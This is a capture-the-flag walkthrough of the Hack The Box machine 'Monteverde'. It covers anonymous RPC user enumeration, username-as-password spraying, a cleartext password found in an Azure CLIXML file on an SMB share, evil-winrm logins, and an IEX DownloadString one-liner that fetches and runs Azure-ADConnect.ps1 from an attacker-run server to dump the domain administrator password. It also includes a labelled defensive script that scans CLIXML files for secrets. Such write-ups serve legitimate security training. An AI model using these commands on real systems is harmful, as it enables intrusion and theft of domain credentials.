HTB Monteverde

Summary:

Setup: Add the box IP to our /etc/hosts file.

$ printf "10.10.10.172\tmonteverde.htb\n" >> /etc/hosts

Enumeration: Perform a detailed port scan on the lower ports of monteverde.htb using nmap to gather information on any exposed services. Then perform a less detailed scan across all ports to identify any open higher ports.

$ sudo nmap -sC -sV monteverde.htb -oA nmap/initial; sleep 300 && \
    sudo nmap -p- -sS monteverde.htb -oA nmap/all-ports
$ cat nmap/initial.nmap
# Nmap 7.80 scan initiated Mon Apr  6 16:05:13 2020 as: nmap -Pn -sC -sV -oA nmap/initial monteverde.htb
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up (0.041s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-06 14:27:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/6%Time=5E8B453B%P=x86_64-unknown-linux-gnu%r(
SF:DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07vers
SF:ion\x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -37m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-04-06T14:30:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr  6 16:09:57 2020 -- 1 IP address (1 host up) scanned in 283.52 seconds

Kerberos stands out as an exploitable service for later. Looking at the LDAP services, the box reports MEGABANK.LOCAL0 as its FQDN, so we add this to our hosts file along with monteverde.htb. Before we can interact with Kerberos, we need to enumerate user accounts. A common weakness is an unsecured MSRPC endpoint that lets us connect anonymously and dump user account information.

$ rpcclient //monteverde.htb -U "" -N
Unable to initialize messaging context
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

User: If we try the username as the password for each user, we have success with SABatchJobs. Next, we enumerate SMB as an authenticated user.

$ python smbmap.py -H monteverde.htb -u SABatchJobs -p SABatchJobs
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445	Name: monteverde.htb
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
...
	.
	dr--r--r--                0 Fri Jan  3 13:12:48 2020	.
	dr--r--r--                0 Fri Jan  3 13:12:48 2020	..
	dr--r--r--                0 Fri Jan  3 13:15:23 2020	dgalanos
	dr--r--r--                0 Fri Jan  3 13:41:18 2020	mhope
	dr--r--r--                0 Fri Jan  3 13:14:56 2020	roleary
	dr--r--r--                0 Fri Jan  3 13:14:28 2020	smorgan
	users$                                            	READ ONLY

After inspecting each folder we find what appears to be a config file.

smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

		524031 blocks of size 4096. 519955 blocks available

After downloading the file and opening it locally, we discover a password for mhope.

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
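
The file above is PowerShell CLIXML (the format Export-Clixml writes), and the password sits in a plain <S> string element. The following is an added example, not part of the original write-up: a small audit helper that flags cleartext secrets in CLIXML files found on shares and separates them from DPAPI-protected <SS> SecureString values. The function name, the property-name pattern and both sample documents are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/powershell/2004/04}"
SENSITIVE = re.compile(r"passw(or)?d|secret|token|api_?key", re.I)  # assumed name list

def scan_clixml(xml_text):
    """Return (type, property, state) for secret-looking properties; never the value."""
    findings = []
    for obj in ET.fromstring(xml_text).iter(NS + "Obj"):
        type_name = obj.findtext(f"{NS}TN/{NS}T", default="(type by reference)")
        # Props holds adapted properties, MS holds extended (note) properties.
        for bag in obj.findall(NS + "Props") + obj.findall(NS + "MS"):
            for prop in bag:
                name, tag = prop.get("N", ""), prop.tag.replace(NS, "")
                if not SENSITIVE.search(name):
                    continue
                if tag == "S" and (prop.text or "").strip():
                    # <S> is a plain string: anyone who can read the file has the secret.
                    findings.append((type_name, name, "cleartext"))
                elif tag == "SS":
                    # <SS> is a SecureString, DPAPI-encrypted for the exporting user and host.
                    findings.append((type_name, name, "dpapi-protected"))
    return findings

# Constructed samples: same shape as the file above, placeholder values only.
CLEARTEXT_SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T></TN>
    <Props>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">EXAMPLE-PLACEHOLDER</S>
    </Props>
  </Obj>
</Objs>"""

PROTECTED_SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T></TN>
    <Props>
      <S N="UserName">EXAMPLE\\svc-placeholder</S>
      <SS N="Password">01000000PLACEHOLDER</SS>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for label, doc in (("cleartext", CLEARTEXT_SAMPLE), ("protected", PROTECTED_SAMPLE)):
        print(label, scan_clixml(doc))
```

Run over every *.xml file a low-privileged account can read; any "cleartext" finding means the credential should be rotated and the file removed from the share.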

We can now log on to the box using evil-winrm over wsman and collect our flag.

$ evil-winrm -P 5985 -u mhope -p "4n0therD4y@n0th3r$" -i monteverde.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> dir ../Desktop/user.txt


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt

Root: We check which groups mhope belongs to, looking for loose permissions.

*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 4:40:05 PM
Password expires             Never
Password changeable          1/3/2020 4:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   4/22/2020 4:18:30 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.

We see mhope is a member of Azure Admins; some searching leads us to Azure-ADConnect.ps1. The HTB VPN doesn’t allow external connections, so we download the script to our local machine and then spawn an HTTP server.

$ wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"
--2020-04-22 13:57:52--  https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2264 (2.2K) [text/plain]
Saving to: ‘Azure-ADConnect.ps1’

Azure-ADConnect.ps1          100%[===========================================>]   2.21K  --.-KB/s    in 0s

2020-04-22 13:57:52 (25.9 MB/s) - ‘Azure-ADConnect.ps1’ saved [2264/2264]

$ python -m http.server

Once downloaded, we import the script on the remote machine and then run the exploit.

*Evil-WinRM* PS C:\Users\mhope\Documents> IEX (New-Object Net.WebClient).DownloadString('http://10.10.XX.XX:8000/Azure-ADConnect.ps1');
*Evil-WinRM* PS C:\Users\mhope\Documents> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

We now have the Administrator credentials, which we can use to connect to the box and read root.txt.

$ evil-winrm -P 5985 -u Administrator -p "d0m@in4dminyeah!" -i monteverde.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop/root.txt


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt